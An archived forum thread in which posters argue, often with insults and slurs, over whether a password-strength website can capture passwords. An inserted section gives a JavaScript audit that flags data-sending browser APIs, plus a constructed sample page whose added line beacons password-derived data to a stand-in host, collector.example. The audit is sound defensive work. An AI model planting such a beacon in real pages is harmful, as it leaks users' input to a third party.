GC_PaNzerFIN
Work and study @ Technical Uni
+528|6384|Finland

Hidden shit really earns my trust for this site

up,up,down,down,left,right,left,right,b,a and highlight the screen
3930K | H100i | RIVF | 16GB DDR3 | GTX 480 | AX750 | 800D | 512GB SSD | 3TB HDD | Xonar DX | W8
Zimmer
Un Moderador
+1,688|6726|Scotland

GC_PaNzerFIN wrote:

Hidden shit really earns my trust for this site

up,up,down,down,left,right,left,right,b,a and highlight the screen
It's a jQuery easter egg. Get over it.
Morpheus
This shit still going?
+508|5969|The Mitten
upupdowndownleftrightleftright
https://static.bf2s.com/files/user/31499/How%20Secure%20Is%20My%20KONAMI.png
EE (hats
mikkel
Member
+383|6571
As a general precaution, I don't enter my passwords anywhere other than the intended fields, but Zimmer is right in this case. There's no code in the source that can establish any connection to transfer anything. Even if the site somehow used an exploit or some form of magic to open a connection, there'd be some sort of actual data transfer involved, but that isn't the case. Nothing is stored anywhere outside of memory, either.

A better reason for why you shouldn't enter your actual passwords on sites like these without thoroughly checking the source code is that they're pretty sweet targets for exploitation. If a system hosting a site is unpatched, or at all vulnerable in some manner, it's a trivial task to replace benign files with replicas suited for less savoury purposes, and that makes any assurance as to the safety of a site obsolete the second they're offered.
killer21
Because f*ck you that's why.
+400|6561|Reisterstown, MD

I can't believe people actually think this site will magically suck up their passwords.  Seems more like paranoia than anything else.  Strange.
Defiance
Member
+438|6641

killer21 wrote:

I can't believe people actually think this site will magically suck up their passwords.  Seems more like paranoia than anything else.  Strange.
When it comes to security, erring on the side of caution is better. Besides, what harm does it do to not enter your password in to a simplistic calculator?
13urnzz
Banned
+5,830|6467

killer21 wrote:

I can't believe people actually think this site will magically suck up their passwords.  Seems more like paranoia than anything else.  Strange.
ok mr. everyone-is-paranoid, if you trust this site so much, what is your password?
mtb0minime
minimember
+2,418|6625

Defiance wrote:

killer21 wrote:

I can't believe people actually think this site will magically suck up their passwords.  Seems more like paranoia than anything else.  Strange.
When it comes to security, erring on the side of caution is better. Besides, what harm does it do to not enter your password in to a simplistic calculator?
My password is in the sense that if you put it in a calculator and turn it upside down it says BOOBIES
tazz.
oz.
+1,338|6145|Sydney | ♥

Thank GOD you corrected burnz Zimmer.

Java is a resource heavy hunk of aids.


Javascript however. Oh how I love you

I scanned through his page quickly when i first looked at the site.. It's 100% safe as Zimmer has already stated.

Things to know.

Serverside: Flat, (That is, not generated) files that are downloaded to your browser.

From there, everything is performed client side. When you type in your password, you're simply telling your browser what to input. The javascript file, which has already been downloaded to your browser is then processed, and shows how secure your password is.

No packets are uploaded once the site is in your browser.

If you want to check, wizz up wireshark.


It shits me when morons come on and start pointing fingers when they have little to no knowledge of any programming language whatsoever.

Grow a brain, or get, the fuck off.

Last edited by tazz. (2010-10-19 22:36:28)

everything i write is a ramble and should not be taken seriously.... seriously.
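
The posts above make two checkable claims: the page source contains nothing that can open a connection, and a review only holds for the files as served at that moment. As an added example (not part of the thread, and not the site's code), this JavaScript audit flags browser APIs that can move data off a page; `auditSources`, the rule list and both sample pages are hypothetical and constructed for illustration.

```javascript
// Added example (not from the thread): flag APIs that can move data off a page.
// Rule list is illustrative, not exhaustive; a hit means "review by hand".
const RULES = [
  { name: 'XMLHttpRequest', re: /\bXMLHttpRequest\b/ },
  { name: 'fetch', re: /\bfetch\s*\(/ },
  { name: 'socket/stream', re: /\bnew\s+(WebSocket|EventSource)\b/ },
  { name: 'sendBeacon', re: /\bsendBeacon\s*\(/ },
  { name: 'image beacon', re: /\bnew\s+Image\b|\.src\s*=(?!=)/ },
  { name: 'navigation', re: /\blocation(\.href)?\s*=(?!=)|\blocation\.(assign|replace)\s*\(/ },
  { name: 'form submit', re: /\.submit\s*\(|<form\b[^>]*\baction\s*=/i },
  { name: 'dynamic code', re: /\beval\s*\(|\bnew\s+Function\b|\bimport\s*\(/ },
  { name: 'external resource',
    re: /<(script|img|iframe|link)\b[^>]*\b(src|href)\s*=\s*["']?(https?:)?\/\//i },
];

// files: [{ name, text }] covering the HTML and every script it loads.
function auditSources(files) {
  const findings = [];
  for (const file of files) {
    file.text.split('\n').forEach((line, i) => {
      for (const rule of RULES) {
        if (rule.re.test(line)) {
          findings.push({ file: file.name, line: i + 1, rule: rule.name, text: line.trim() });
        }
      }
    });
  }
  return { clean: findings.length === 0, findings };
}

// Constructed sample: a strength meter that only reads the field and updates the DOM.
const reviewedPage = [
  '<input id="pw" type="password">',
  '<span id="out"></span>',
  '<script>',
  'document.getElementById("pw").oninput = function (e) {',
  '  var n = e.target.value.length;',
  '  document.getElementById("out").textContent = n < 8 ? "weak" : "ok";',
  '};',
  '</script>',
].join('\n');

// Constructed sample: the same page after one line was added on the server.
// The added line reports only the length, which is enough to trip the audit.
const replacedPage = reviewedPage.replace(
  '  var n = e.target.value.length;',
  '  var n = e.target.value.length;\n  new Image().src = "//collector.example/p?l=" + n;'
);

console.log(auditSources([{ name: 'index.html', text: reviewedPage }]));
console.log(auditSources([{ name: 'index.html', text: replacedPage }]));
```

A pattern scan like this misses obfuscated code, so it complements rather than replaces the packet capture and the disconnect-then-type test suggested in the thread, and it has to be re-run against the files served on each visit.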
Zimmer
Un Moderador
+1,688|6726|Scotland

Defiance wrote:

killer21 wrote:

I can't believe people actually think this site will magically suck up their passwords.  Seems more like paranoia than anything else.  Strange.
When it comes to security, erring on the side of caution is better. Besides, what harm does it do to not enter your password in to a simplistic calculator?
That's totally understandable. What isn't understandable is when people start making up retarded ways in which that site MAY steal your password. If you don't know what you're talking about, keep your mouth shut. It just makes you look like an utter fool.
rdx-fx
...
+955|6562

Zimmer wrote:

You don't seem to understand that there is no "route". That page is static and all that you see there is being rendered by your browser. Absolutely nothing on that page is server side. So however much you like your lovely little theory, it's totally and utterly pointless for this. You aren't submitting anything, nothing is getting parsed by the server, the server isn't taking note of your keystrokes. And no, you cannot "hide" a file into the JS or HTML and hope that nobody sees it whilst it sends data to the server. The fact is that that page could be rendered on your computer, my computer, a server and it wouldn't be able to do anything. There is no server side ANYTHING.

Lovely little theory though, too bad it's total bollocks for the site at hand.

Zimmer wrote:

That's totally understandable. What isn't understandable is when people start making up retarded ways in which that site MAY steal your password. If you don't know what you're talking about, keep your mouth shut. It just makes you look like an utter fool.
You and your condescending little attitude don't seem to grasp what I'm getting at.

One, it is not good security policy to throw your passwords at foreign sites. Period.
Two, "assumption is the mother of all fuckups" and the good illusionist always has you watching the wrong hand.
(i.e., don't get so fixated on the harmless javascript that you ignore the potential from other avenues)
As a moderator and tech team member, I would think you'd see that point first. 

Baffling that you get so defensive, condescending, and downright insulting in defense of a potentially hostile outside website.

My "lovely little theory", as you so derisively put it, is a basic example of a man in the middle attack, put in simplest terms.  Even had a link to more specific details in my post. It was an example of one amongst many ways a hostile site could screw you from behind while showing you harmlessness up front. It was an example of my second point above.

And if you, personally, do not know enough of the relevant code to verify it as harmless, it's good policy to not screw around with sites like the OP.  You, Zimmer, may be able to look at the code and verify it, in this specific instance. Are you sure you didn't miss a vulnerability somewhere else?  While you're looking at the obvious harmless end (javascript), do you know you're not missing a vulnerability somewhere else? Are you sure you want to advise others to play around with such a site?

Looking at it from a security point of view, the site sets off numerous warnings;
Asking for passwords (social engineering 101, ask nicely first),
basic whois query comes back with a very recent registration date,
shows a domain registered for the minimum of 1 year,
and domain is apparently owned by a company that registers domains in bulk (not a sub-registrar).
GC_PaNzerFIN
Work and study @ Technical Uni
+528|6384|Finland

Zimmer wrote:

Defiance wrote:

killer21 wrote:

I can't believe people actually think this site will magically suck up their passwords.  Seems more like paranoia than anything else.  Strange.
When it comes to security, erring on the side of caution is better. Besides, what harm does it do to not enter your password in to a simplistic calculator?
That's totally understandable. What isn't understandable is when people start making up retarded ways in which that site MAY steal your password. If you don't know what you're talking about, keep your mouth shut. It just makes you look like an utter fool.
Jesus fucking christ, never ever advise people to break even the basic security rules. You call people idiots and yet you are the one advising people to use sites like this, and use your password where it is not needed. You obviously skipped all network security studies, makes me very worried that someone with JS skills totally ignores key area like security.

There are shitload of potential risks, and ways to get in the middle of even seemingly secure sites. And those are not imaginary, they are very real. But put your head in the bag and throw away your passwords, make up there is no such things as network threats and start calling people idiots if they have even little common sense to question what the fuck others are doing.

Oh and your attitude is pretty damn hostile for moderator, what's up with that?

Last edited by GC_PaNzerFIN (2010-10-20 03:58:28)

3930K | H100i | RIVF | 16GB DDR3 | GTX 480 | AX750 | 800D | 512GB SSD | 3TB HDD | Xonar DX | W8
Winston_Churchill
Bazinga!
+521|6709|Toronto | Canada

Has anyone tried opening the page, disconnecting from the internet and then entering your password.  He said in the FAQ that would work and it would solve this argument pretty quickly...
13urnzz
Banned
+5,830|6467

Zimmer wrote:

If you don't know what you're talking about, keep your mouth shut.
are you going to start censoring people that you don't agree with now? you can take your attitude and fuck off.
killer21
Because f*ck you that's why.
+400|6561|Reisterstown, MD

Defiance wrote:

When it comes to security, erring on the side of caution is better. Besides, what harm does it do to not enter your password in to a simplistic calculator?
Understandable.   
RDMC
Enemy Wheelbarrow Spotted..!!
+736|6535|Area 51

Winston_Churchill wrote:

Has anyone tried opening the page, disconnecting from the internet and then entering your password.  He said in the FAQ that would work and it would solve this argument pretty quickly...
Just tried it. Page still works.
tazz.
oz.
+1,338|6145|Sydney | ♥

burnzz wrote:

Zimmer wrote:

If you don't know what you're talking about, keep your mouth shut.
are you going to start censoring people that you don't agree with now? you can take your attitude and fuck off.
Zimmer has a valid point.

--

I can understand people not wanting to put in their own passwords, and that's fine.

But when people start going "how stupid are you"

Well, I actually know javascript, i have read the site, so up yours and gtfo. etc
everything i write is a ramble and should not be taken seriously.... seriously.
Peter
Super Awesome Member
+494|6372|dm_maidenhead
For my laptop login: https://i53.tinypic.com/29n72w8.png
lol. i just have it because it takes no time to type it.

3 years for one of my important ones.

Last edited by Peter (2010-10-20 07:25:50)

tazz.
oz.
+1,338|6145|Sydney | ♥

lol.

Shame on you sir
everything i write is a ramble and should not be taken seriously.... seriously.
13urnzz
Banned
+5,830|6467

tazz. wrote:

burnzz wrote:

Zimmer wrote:

If you don't know what you're talking about, keep your mouth shut.
are you going to start censoring people that you don't agree with now? you can take your attitude and fuck off.
Zimmer has a valid point.

--

I can understand people not wanting to put in their own passwords, and that's fine.

But when people start going "how stupid are you"

Well, I actually know javascript, i have read the site, so up yours and gtfo. etc
Tazz, i know very little of javascript. but i work in a mid sized company, and there are practices that protect personal and company property

Defiance wrote:

When it comes to security, erring on the side of caution is better.
this, as IT staff, is what i've tried to get users to understand

Zimmer wrote:

That's totally understandable. What isn't understandable is when people start making up retarded ways in which that site MAY steal your password.
as a programmer, Zimmer may be exactly correct, but he's not right. i have to think of ways countless programs and websites can and will impact my employer and my users, so the statement above sucks donkey balls.


GC_PaNzerFIN wrote:

Jesus fucking christ, never ever advise people to break even the basic security rules.
Panzer nailed it. i have nothing to add to that.
tazz.
oz.
+1,338|6145|Sydney | ♥

Why stress certain "rules" towards a site proven to be safe?
everything i write is a ramble and should not be taken seriously.... seriously.
GC_PaNzerFIN
Work and study @ Technical Uni
+528|6384|Finland

tazz. wrote:

Why stress certain "rules" towards a site proven to be safe?
How do you prove it is safe? We are now talking about high interest target site, I know examples of perfectly "safe" sites that have been compromised although the actual owner didn't mean them to be any harm. Even pass all link scanners and be first on google search results, yet be very nasty in terms of security.

There are zero benefits from giving away your password, yet there is potential harm. It is useless to talk about security when ppl throw away all advice starting from most important one everyone should know by now, never tell your password to anyone. I wish one day people would start using their common sense, goes far in terms of security.

Last edited by GC_PaNzerFIN (2010-10-20 07:54:24)

3930K | H100i | RIVF | 16GB DDR3 | GTX 480 | AX750 | 800D | 512GB SSD | 3TB HDD | Xonar DX | W8
tazz.
oz.
+1,338|6145|Sydney | ♥

You can't hack a link that isn't made. Moron.
everything i write is a ramble and should not be taken seriously.... seriously.
Uzique
dasein.
+2,865|6441
i love how tech geeks can get all arrogant and obnoxious when talking about their subject but then if, for example, i do it about literature... im being an elitist faggot. hahaha. the amount of tech egos going around in this thread is astounding... "herp derp im tech team"... "herp derp im a compsci undergrad"... "herp derp im a programmer"... "herp derp i have a subscription to pc gamer magazine"

jesus christ enter in ya passwords or shut the fuck up
libertarian benefit collector - anti-academic super-intellectual. http://mixlr.com/the-little-phrase/
Zimmer
Un Moderador
+1,688|6726|Scotland

rdx-fx wrote:

Zimmer wrote:

You don't seem to understand that there is no "route". That page is static and all that you see there is being rendered by your browser. Absolutely nothing on that page is server side. So however much you like your lovely little theory, it's totally and utterly pointless for this. You aren't submitting anything, nothing is getting parsed by the server, the server isn't taking note of your keystrokes. And no, you cannot "hide" a file into the JS or HTML and hope that nobody sees it whilst it sends data to the server. The fact is that that page could be rendered on your computer, my computer, a server and it wouldn't be able to do anything. There is no server side ANYTHING.

Lovely little theory though, too bad it's total bollocks for the site at hand.

Zimmer wrote:

That's totally understandable. What isn't understandable is when people start making up retarded ways in which that site MAY steal your password. If you don't know what you're talking about, keep your mouth shut. It just makes you look like an utter fool.
You and your condescending little attitude don't seem to grasp what I'm getting at.

One, it is not good security policy to throw your passwords at foreign sites. Period.
Two, "assumption is the mother of all fuckups" and the good illusionist always has you watching the wrong hand.
(i.e., don't get so fixated on the harmless javascript that you ignore the potential from other avenues)
As a moderator and tech team member, I would think you'd see that point first. 

Baffling that you get so defensive, condescending, and downright insulting in defense of a potentially hostile outside website.

My "lovely little theory", as you so derisively put it, is a basic example of a man in the middle attack, put in simplest terms.  Even had a link to more specific details in my post. It was an example of one amongst many ways a hostile site could screw you from behind while showing you harmlessness up front. It was an example of my second point above.

And if you, personally, do not know enough of the relevant code to verify it as harmless, it's good policy to not screw around with sites like the OP.  You, Zimmer, may be able to look at the code and verify it, in this specific instance. Are you sure you didn't miss a vulnerability somewhere else?  While you're looking at the obvious harmless end (javascript), do you know you're not missing a vulnerability somewhere else? Are you sure you want to advise others to play around with such a site?

Looking at it from a security point of view, the site sets off numerous warnings;
Asking for passwords (social engineering 101, ask nicely first),
basic whois query comes back with a very recent registration date,
shows a domain registered for the minimum of 1 year,
and domain is apparently owned by a company that registers domains in bulk (not a sub-registrar).
My apologies for my first couple of answers, it was stupid of me to jump to such a hostile and condescending stance. I sounded like a prick re-reading them.

I realise all your suggestions and security holes are entirely plausible on any website given certain circumstances... But what I am merely referring to is this website. Of course there are websites that use javascript and the sort to steal passwords, but I'm merely referring to this one.

I also realise that not everyone would know how to check the site is legit, and therefore won't enter their passwords... but I merely just said a couple of pages back that it is 100% safe and nothing can be taken from that site. I said it to the users on this post, because some were having certain concerns about the legitimacy of the site at hand. This was not meant to be directed at a general "if someone says it's safe, then it must be safe" or "all these kind of sites are safe". I was merely advising the users above me that it was safe and I knew it was safe. You choose to disagree with me and start firing theories as to how it is NOT safe? Fine, you do that... but programming isn't a question of Ifs or buts... it's a simple YES or NO answer to your question. I was stating a fact, nothing more.

Am I sure that that site is safe? Yes. Would I bet my life on it? Yes.

I didn't miss any security concerns. I know about all of them and I'm not saying they not question for doubt... all I'm saying is that as the site stands, it cannot be stealing your password. All those security concerns should of course be taken into account if you don't know any Javascript or XHTML and therefore if you have no "trusted" (I put it in inverted commas because clearly my statement of fact wasn't really listened to and I wasn't trusted on it, which is fair enough, but I was still merely stating it was a safe site.) source telling you it's safe, then don't type in your password.

Panzer, this hasn't become about security 101 and the common sense that we should all be applying to the internet. I totally understand that we should all be very cautious about where we put in sensitive data and the sort - this specific post was about that specific site. Let's not branch off from the actual discussion about the site itself. I don't disagree with all your comments about having common sense and not putting in your password in untrusted sites, what I'm saying is that this site is safe. I have not advised anybody to go to other, potentially, harmful sites and start putting in their passwords. I have said that this specific site is fine for doing so.

Yes, there are many ways in which a server can be compromised, and in which you can steal passwords, but this site doesn't employ any of them. Fact. It doesn't because it can't. Nothing is server side and therefore all that is getting displayed is coming directly from your browser. Now, that you have a keylog or a trojan on your computer, that's not the site's fault.

My attitude was awful in the posts above, and for that I do apologise.

At the end of the day, this site is safe, but you shouldn't in principle be putting in your passwords on random and potentially risky sites. Is that a better way of putting it?
